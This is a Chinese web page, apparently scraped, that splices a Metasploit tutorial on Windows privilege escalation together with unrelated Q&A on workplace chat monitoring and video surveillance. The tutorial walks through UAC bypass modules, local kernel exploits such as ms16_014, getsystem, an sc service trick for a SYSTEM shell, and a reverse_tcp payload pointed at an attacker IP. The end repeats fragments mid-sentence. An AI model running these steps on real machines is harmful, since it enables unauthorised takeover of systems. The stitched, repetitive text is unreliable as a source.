MSF内网渗透系列2-权限提升
在上篇文章中,通过win7运行msf.exe,kali接收到一个session,但这个session权限只是普通权限,无法做更多的操作。
权限提升
1.提高程序运行级别
2.UAC绕过
3.利用提权漏洞进行提权
提高程序运行级别
msf模块exploit/windows/local/ask
但会触发UAC,只有当用户同意是才能获得更高权限
可以看到session 5只是普通权限,这时候利用ask模块进行提权,该模块需要设置要用来提权的session,以及启动程序的名称
ask模块设置完成后,就可以使用了,运行exploit,回到win7,可以看见弹出一个execl.exe程序框,如果你点击是,则kali会获得一个新的session,如果点击否,则kali会得到失败信息。
Win7 截图:
win7 点击 否,kali返回信息:
win7 点击 是,kali获取到新的session
使用background退出这个meterpreter
使用sessions,查看session
使用sessions -i 6,进入新获取的session
使用getuid查看该session权限
发现还是普通权限
这时候使用getsystem,获得系统权限
再使用getuid查看
UAC绕过
msf模块
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
这里使用第一个模块进行绕过UAC提权
利用提权漏洞进行提权
exploit/windows/local/ms14_058_track_popup_menu
等等
这里使用
exploit/windows/local/ms16_014_wmi_recv_notif
这个模块,同样使用info和show options查看信息,只需要设置一个session就可以使用
攻击成功会直接返回一个shell,使用whoami查看权限
成功提权
在公司内网使用微信,聊天记录能被监控吗?
企业微信的聊天记录是可以被领导看到的,甚至是你撤回的消息,都是可以被看到的。因为企业微信有一项会话存档功能,在取得员工和客户的同意之后,就能够保存员工与客户的聊天记录,方便管理员查看。至于说有没有被窥探隐私,这是不存在的。 在工作期间,使用企业微信就是跟客户聊天,私人聊天一般使用个人微信,而企业并不会监控个人微信的聊天记录。
企业将员工与客户的聊天记录保存下来的目的:
将员工与客户的企业微信聊天记录保存下来,从而了解员工在聊天过程中是否遵循公司制度,有没有出现辱骂客户、私自承诺客户的错误言论。企业微信的会话存档是实时保存聊天内容的,即使撤回,管理员还是可以在后台看到的。所以,作为员工,一定要熟悉公司产品的特性、功能,才能在与客户聊天时,比较得心应手
公司有局域网监控,能否查到我们的聊天记录
如果只是在路由器上做的监控限制的话,是监控不到聊天的具体内容的,但是可以知道哪几个QQ号登入的状况,意思就是能知道你的QQ号码,内容是看不到的。但是如果用第三方或者别的监控软件有在你们电脑上安装过什么的话,也是有能看到你们聊天记录的方法的。就看你们公司网管是用的什么监控限制!
渗透测试之内网提权
UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。
当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac
开始提权
getsystem
提权失败 一般都是上面说的uac的问题 常识 bypass uac
输入background 让该会话在后台运行 不在这个模式下 没办法调用msf的提权模块
使用提权工具
set SESSION 2(这个session要和之前监听的那个session一样 否则不成功)
set TECHNIQUE up.exe
set TECHNIQUE EXE
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
show options
sessions -i
exploit
或者使用
use post/windows/gather/enum_patches
需要设置一下session
如果目标系统安装了安全更新的话是无法提权成功的
出现这种情况就是无法成功提权 可利用的漏洞都被打上补丁了
或者漏洞编号:ms11-080
windows 7、8、08、12、16下可以成功 2003也可以
关于sc命令:
SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。
这个命令的意思是创建一个名叫syscmd的新的交互式的cmd服务
然后执行
sc start systcmd,就得到了一个system权限的cmd环境
政务内网会被监控聊天记录吗
是的,是会监视的。
因为IP的切换不是什么问题,主要是你们的电脑都是通过服务器才连接外网的,不要说是网页,就是QQ聊天记录也是可以被监控的。
监控系统是安防系统中应用最多的系统之一,现在市面上较为适合的工地监控系统是手持式视频通信设备,视频监控现在是主流。 从最早模拟监控到前些年火热数字监控再到现在方兴未艾网络视频监控,发生了翻天覆地变化。在IP技术逐步统一全球今天,我们有必要重新认识视频监控系统发展历史。从技术角度出发,视频监控系统发展划分为第一代模拟视频监控系统(CCTV),到第二代基于"PC+多媒体卡"数字视频监控系统(DVR),到第三代完全基于IP网络视频监控系统(IPVS)。
代完全基于IP网络视频监控系统(IPVS)。
的。所以,作为员工,一定要熟悉公司产品的特性、功能,才能在与客户聊天时,比较得心应手公司有局域网监控,能否查到我们的聊天记录如果只是在路由器上做的监控限制的话,是监控不到聊天的具体内容的,但是可以知道哪几个Q